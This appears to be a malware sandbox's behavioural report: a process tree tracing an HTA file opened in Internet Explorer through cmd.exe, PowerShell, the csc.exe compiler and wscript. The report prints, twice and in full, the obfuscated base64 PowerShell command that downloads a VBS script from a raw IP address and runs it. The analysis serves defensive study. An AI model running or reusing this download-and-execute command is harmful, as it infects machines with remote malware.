| ZeroBOX

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\IEnetcat.hta.html
2628
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2628 CREDAT:145409
  2716
  - cmd.exe "C:\Windows\system32\cmd.exe" "/c PowERsHELl.exe -Ex BYPaSS -nOP -W 1 -C devIcecrEDeNTiALDepLoYmenT.exE ; iEX($(IeX('[sySTeM.texT.EnCOdInG]'+[CHaR]58+[Char]0x3A+'uTf8.gEtsTring([SYstEm.coNvert]'+[char]58+[cHar]0x3a+'frOMbAsE64StriNG('+[cHAR]34+'JElWdFJheSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CRXJERUZJbmlUSU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsTW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9qWllBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR21CZ2V0SmpEcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9ZTWZTb3UsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0YsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrd0F2WHVoa0xaWSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJQdGx0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUVzcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ2NVa1BIRiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJElWdFJheTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjIzOS4xMTIvMTE5L3NhaG9zdC52YnMiLCIkZW52OkFQUERBVEFcc2Fob3N0LnZicyIsMCwwKTtTdGFSdC1TbGVlcCgzKTtzVGFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzYWhvc3QudmJzIg=='+[Char]0X22+'))')))"
    2956
    - powershell.exe PowERsHELl.exe -Ex BYPaSS -nOP -W 1 -C devIcecrEDeNTiALDepLoYmenT.exE ; iEX($(IeX('[sySTeM.texT.EnCOdInG]'+[CHaR]58+[Char]0x3A+'uTf8.gEtsTring([SYstEm.coNvert]'+[char]58+[cHar]0x3a+'frOMbAsE64StriNG('+[cHAR]34+'JElWdFJheSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CRXJERUZJbmlUSU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsTW9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9qWllBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR21CZ2V0SmpEcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9ZTWZTb3UsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0YsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrd0F2WHVoa0xaWSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJQdGx0IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUVzcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ2NVa1BIRiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJElWdFJheTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjIzOS4xMTIvMTE5L3NhaG9zdC52YnMiLCIkZW52OkFQUERBVEFcc2Fob3N0LnZicyIsMCwwKTtTdGFSdC1TbGVlcCgzKTtzVGFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxzYWhvc3QudmJzIg=='+[Char]0X22+'))')))"
      3016
      - csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\gh_jpqeh.cmdline"
        2660
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESC148.tmp" "c:\Users\test22\AppData\Local\Temp\CSCC0CA.tmp"
        544
      - wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Roaming\sahost.vbs"
        2116

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents